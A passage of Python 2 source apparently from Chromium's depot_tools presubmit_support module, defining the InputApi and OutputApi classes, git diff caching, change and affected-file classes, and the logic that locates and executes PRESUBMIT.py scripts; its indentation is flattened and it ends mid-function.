def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
labelinfo = changeinfo.get('labels', {}).get('Code-Review', {})
values = labelinfo.get('values', {}).keys()
try:
max_value = max(int(v) for v in values)
reviewers = [r for r in labelinfo.get('all', [])
if r.get('value', 0) == max_value]
except ValueError: # values is the empty list
reviewers = []
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r"(^|.*?[\\\/])[^.]+$" to the white list.
# Note that ALL CAPS files are black listed in DEFAULT_BLACK_LIST below.
DEFAULT_WHITE_LIST = (
# C++ and friends
r".+\.c$", r".+\.cc$", r".+\.cpp$", r".+\.h$", r".+\.m$", r".+\.mm$",
r".+\.inl$", r".+\.asm$", r".+\.hxx$", r".+\.hpp$", r".+\.s$", r".+\.S$",
# Scripts
r".+\.js$", r".+\.py$", r".+\.sh$", r".+\.rb$", r".+\.pl$", r".+\.pm$",
# Other
r".+\.java$", r".+\.mk$", r".+\.am$", r".+\.css$", r".+\.mojom$",
r".+\.fidl$"
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_BLACK_LIST = (
r"testing_support[\\\/]google_appengine[\\\/].*",
r".*\bexperimental[\\\/].*",
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r".*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*",
# Output directories (just in case)
r".*\bDebug[\\\/].*",
r".*\bRelease[\\\/].*",
r".*\bxcodebuild[\\\/].*",
r".*\bout[\\\/].*",
# All caps files like README and LICENCE.
r".*\b[A-Z0-9_]{2,}$",
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r"(|.*[\\\/])\.git[\\\/].*",
r"(|.*[\\\/])\.svn[\\\/].*",
# There is no point in processing a patch file.
r".+\.diff$",
r".+\.patch$",
)
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cPickle = cPickle
self.cpplint = cpplint
self.cStringIO = cStringIO
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
# TODO(yyanagisawa): stop exposing this when python3 become default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.marshal = marshal
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.pickle = pickle
self.re = re
self.subprocess = subprocess
self.tempfile = tempfile
self.time = time
self.traceback = traceback
self.unittest = unittest
self.urllib2 = urllib2
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'python'. This is interpreted in CallCommand to
# convert to vpython in order to allow scripts in other repos (e.g. src.git)
# to automatically pick up that repo's .vpython file, instead of inheriting
# the one in depot_tools.
self.python_executable = 'python'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
# TODO(dpranke): figure out a list of all approved owners for a repo
# in order to be able to handle wildcard OWNERS files?
self.owners_db = owners.Database(change.RepositoryRoot(),
fopen=file, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with "base/containers/hash_tables.h" instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
presubmit script. For example, It can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof.
"""
dir_with_slash = normpath("%s/" % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug("LocalPaths: %s", paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn("AffectedTestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return filter(lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self, affected_file, white_list=None, black_list=None):
"""Filters out files that aren't considered "source file".
If white_list or black_list is None, InputApi.DEFAULT_WHITE_LIST
and InputApi.DEFAULT_BLACK_LIST is used respectively.
The lists will be compiled as regular expression and
AffectedFile.LocalPath() needs to pass both list.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, white_list or self.DEFAULT_WHITE_LIST) and
not Find(affected_file, black_list or self.DEFAULT_BLACK_LIST))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return filter(source_file, self.AffectedTestableFiles())
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in "new" version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
Note: The carriage return (LF or CR) is stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
tests = []
msgs = []
parallel = parallel and self.parallel
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
if not parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
# Compute a single diff for all files and parse the output; should
# with git this is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
# filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
raise PresubmitFailure(
'Unified diff did not contain entry for file %s' % path)
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
Deleted files are not text file."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the "left hand side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the "right hand
side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
return self._cached_new_contents[:]
def ChangedContents(self):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
if self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
self._cached_changed_contents = []
line_num = 0
for line in self.GenerateScmDiff().splitlines():
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
self._cached_changed_contents.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or "tag") lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. "FOO="
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or "tag" lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r"^[A-Z_]*$", attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
footers = []
unsplit_footers = git_footers.parse_footers(self._full_description).get(
'Bug', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a "R:" git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(agable): Remove support for 'Tbr:' when TBRs are programmatically
# determined by self-CR+1s.
footers = git_footers.parse_footers(self._full_description).get('Tbr', [])
return sorted(set(tags + footers))
# TODO(agable): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = filter(file_filter, self._affected_files)
if include_deletes:
return affected
return filter(lambda x: x.Action() != 'D', affected)
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
warn("AffectedTeestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return filter(lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in "new" version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = set([os.path.dirname(f) for f in files])
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
class GetTryMastersExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, project, change):
"""Executes GetPreferredTryMasters() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
project: Project name to pass to presubmit script for bot selection.
Return:
A map of try masters to map of builders to set of tests.
"""
context = {}
try:
exec script_text in context
except Exception, e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'GetPreferredTryMasters'
if function_name not in context:
return {}
get_preferred_try_masters = context[function_name]
if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2:
raise PresubmitFailure(
'Expected function "GetPreferredTryMasters" to take two arguments.')
return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, cl, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
cl: The Changelist object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec script_text in context
except Exception, e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(cl, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.iteritems(),
masters2.iteritems()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.iteritems():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoGetTryMasters(change,
changed_files,
repository_root,
default_presubmit,
project,
verbose,
output_stream):
"""Get the list of try masters from the presubmit scripts.
Args:
changed_files: List of modified files.
repository_root: The repository root.
default_presubmit: A default presubmit script to execute in any case.
project: Optional name of a project used in selecting trybots.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
Return:
Map of try masters to map of builders to set of tests.
"""
presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = {}
executer = GetTryMastersExecuter()
if default_presubmit:
if verbose:
output_stream.write("Running default presubmit script.\n")
fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
results = _MergeMasters(results, executer.ExecPresubmitScript(
default_presubmit, fake_path, project, change))
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results = _MergeMasters(results, executer.ExecPresubmitScript(
presubmit_script, filename, project, change))
# Make sets to lists again for later JSON serialization.
for builders in results.itervalues():
for builder in builders:
builders[builder] = list(builders[builder])
if results and verbose:
output_stream.write('%s\n' % str(results))
return results
def DoPostUploadExecuter(change,
cl,
repository_root,
verbose,
output_stream):
"""Execute the post upload hook.
Args:
change: The Change object.
cl: The Changelist object.
repository_root: The repository root.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
"""
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = []
executer = GetPostUploadExecuter()
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, cl, change))
output_stream.write('\n')
if results:
output_stream.write('** Post Upload Hook Messages **\n')
for result in results:
result.handle(output_stream)
output_stream.write('\n')
return results
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose,
gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
os.chdir(os.path.dirname(presubmit_path))
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
try:
exec script_text in context
except Exception, e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
# These function names must change if we make substantial changes to
# the presubmit API that are not backwards compatible.
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in context:
try:
context['__args'] = (input_api, output_api)
logging.debug('Running %s in %s', function_name, presubmit_path)
result = eval(function_name + '(*__args)', context)
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
map(os.remove, input_api._named_temporary_files)
if not (isinstance(result, types.TupleType) or
isinstance(result, types.ListType)):
raise PresubmitFailure(
'Presubmit functions must return a tuple or list')
for item in result:
if not isinstance(item, OutputApi.PresubmitResult):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
else:
result = () # no error since the script doesn't care about current event.
# Return the process to the original working directory.
os.chdir(main_path)
return result
def DoPresubmitChecks(change,
committing,
verbose,
output_stream,
input_stream,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
output_stream: A stream to write output from presubmit tests to.
input_stream: A stream to read input from the user.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
Warning:
If may_prompt is true, output_stream SHOULD be sys.stdout and input_stream
SHOULD be sys.stdin.
Return:
A PresubmitOutput object. Use output.should_continue() to figure out
if there were errors or warnings and the caller should abort.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
output = PresubmitOutput(input_stream, output_stream)
if committing:
output.write("Running presubmit commit checks ...\n")
else:
output.write("Running presubmit upload checks ...\n")
start_time = time.time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
output.write("Warning, no PRESUBMIT.py found.\n")
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel)
if default_presubmit:
if verbose:
output.write("Running default presubmit script.\n")
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
output.more_cc.extend(executer.more_cc)
errors = []
notifications = []
warnings = []
for result in results:
if result.fatal:
errors.append(result)
elif result.should_prompt:
warnings.append(result)
else:
notifications.append(result)
output.write('\n')
for name, items in (('Messages', notifications),
('Warnings', warnings),
('ERRORS', errors)):
if items:
output.write('** Presubmit %s **\n' % name)
for item in items:
item.handle(output)
output.write('\n')
total_time = time.time() - start_time
if total_time > 1.0:
